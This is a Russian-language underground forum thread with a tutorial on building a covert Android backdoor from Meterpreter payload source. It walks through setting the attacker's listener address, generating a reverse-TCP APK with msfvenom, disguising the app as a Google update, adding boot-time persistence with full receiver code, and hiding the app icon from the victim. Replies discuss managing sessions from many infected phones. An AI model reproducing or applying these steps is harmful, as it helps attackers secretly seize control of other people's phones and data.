Актуально Собираем скрытый троян на Android(слито)

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
СТАТЬЯ СЛИТА! Прежде чем начинать "собирать троян" подумайте,надо ли вам оно.

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе. В дальнейшем можно внедрять различного рода скрипты.

Что нам понадобится:

Android Studio и Android SDK
офф_сайт(
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
)
Android Meterpreter Payload source code (
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
)
Ссылки так же будут в описании видео

Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности - стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.
Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как
e806aeb5f0c9f444fbb298f4b77a71b7.png
7ab02f60a454855e9542b407016c8317.png
это самая распространенная версия Android по статистике разработчиков.
Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких
визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.
18aa310a174fe12f10374faa243c43bd.png


На этом подготовительный этап завершен
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.
aa70b27f8cb3dfe359040d521199ae8e.png
Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.
0e693f4cb47e3ebe109d6f4f8d69e9db.png
Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)
a2bcbce358166f311642e656892407a4.png

Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )
2545786ea5ac92926367663f030da036.png

Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)
cec30cdb85a23601b6d115cb538e6f6a.png
9f31581f208f2747dec1aac800680e8c.png
Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")

e4af0754c17daa974c4b92ea8322e968.png
3991ff1f837e24efe32529bb595440c5.png


Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)
e33055db3e020196d6303dfce1993ddf.jpg
408a9626019cb8c44c8f255556c1057a.jpg

Скопируем разрешение с манифеста в наш проект

5b3560ecb8c8e80348800d003094fe52.png

67322cf1e568e5d33f286e3c7abda9de.png

Далее осталось подписать наше приложения.

d3b0c1b278cdfdd132e4f6285e5ed3fd.png

887d2b70ee74e6371dd5d07bc4530ead.png

Подписали) Ну что ж давайте протестим.))
bd481472d87bbb37eeae344286c40d7c.png
0d5c4644796d817185972ffb935985be.jpg
469169882af76c677c30eee3123e690b.jpg

1275a8b3d67542d5b9ba7566af0ddb1e.jpg

6034795f125b0705a0fc7eae8a87cfd6.jpg

На этом наш этап пока закончим.Продолжения следует в следующей статье(видео)
Всем спасибо.




Прежде чем приступить к прочтению данной статьи настоятельно рекомендую прочитать подготовительную статью о настройках payload и как собирать подписанное апк приложения в android studio из исходников.
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Этап 1 (Создаем ресивер)

И так после того как мы научились с вами собирать нашего вредоноса,плавно перейдем к тому моменту,когда нужно что бы наш троян запускался после перезагрузки андроид устройства.
Первым делом добавим в AndroidManifest.xml ресивер который будет запускаться после удачного запуска устройства и запускать класс StartOnBoot,который мы допишем немножко позже.
Добавим следующие строки в AndroidManifest.xml после закрывающего тега </service>
Скрытое содержимое, доступно для групп : Registered
Код (Text):
<receiver android:name="com.darknode.darknode.StartOnBoot">
android:label="Start On Boot">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED">
</action>
</intent-filter>
</receiver>
e494c29a4e3387b3d7dddf20d45659d8.png

Этап 2 ( Создаем класс StartOnBoot)

Дальше создаем класс StartOnBoot в нашем проекте который будет запускаться после запуска устройства.

Добавляем туда следующий контент:
Скрытое содержимое, доступно для групп : Registered
Код (Text):
package com.darknode.darknode;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

/**
* Created by CorpOfHack on 20.11.2016.
*/
public class StartOnBoot extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
Intent DarkNodeIntent = new Intent(context,MyIntentService.class);
DarkNodeIntent.addFlags(intent.FLAG_ACTIVITY_NEW_TASK);
context.startService(DarkNodeIntent);
}
}
}
43fee32eb4cfabade0c0595029173e4d.png
d0a78bfe150ab4717707896d78cad99e.png

Далее подписываем,собираем,тестируем.
Как видим после перезагрузки телефона,к нам прилетает сессия метерпретер.
Но приложения видно в списке приложений лаунчера. По этому если жертва что то заподозрит то она
его просто удалит и сессия закроется.Нам это же конечно не нужно и мы переходит к 3-му этапу.

Этап 3 ( Делаем приложения невидимым)
А делается это очень и очень просто.
Нам всего лишь нужно будет удалить активити в AndroidManifest.xml

Для этого просто удалим следующий контент из AndroidManifest.xml:
Скрытое содержимое, доступно для групп : Registered
Код (Text):
<activity
android:name="com.darknode.darknode.MainActivity"
android:label="@string/app_name"
android:theme="@android:style/Theme.NoDisplay" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
20b1ca38e2e51a8277c95a63695b33e5.png
cbda06abdd49e91c250d67d61bdd6eab.png

И собрать наш апк файл без активити.
1bae8074014c05af19ebc261fe0f86e1.png
Тестируем)
56127c0517d9dd4cbd084ea948f9b3c9.jpg
Как видим после перезапуска телефона к нам прилетела метерпретер сессия и приложения не видно в списке приложений лаунчера.
 

carapa44

Участник

carapa44

Участник
12 Янв 2017
6
2
тк я слишком ленивая задница что бы всё это читать и вдумываться, скажите, для чего столько мучений?
 

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
carapa44, в каком разделе находится статья? И подумай хорошо!
 

surzisss

Участник

surzisss

Участник
5 Окт 2016
128
13
если использовать как троян, так проще через аирдроид шоле...
 

byali

Участник

byali

Участник
18 Окт 2016
2
0
То чувство, когда новорег и ничего не понимаешь...
 

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Shramik, да! Только вот при осуществлении баги могут быть.
 

Htonion

Участник

Htonion

Участник
17 Окт 2017
2
0
Интересно вот что, если много будет загрузок, то как быть? В метерперетере будет выбор сессии с каждым так сказать клиентом на порту 1555?
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя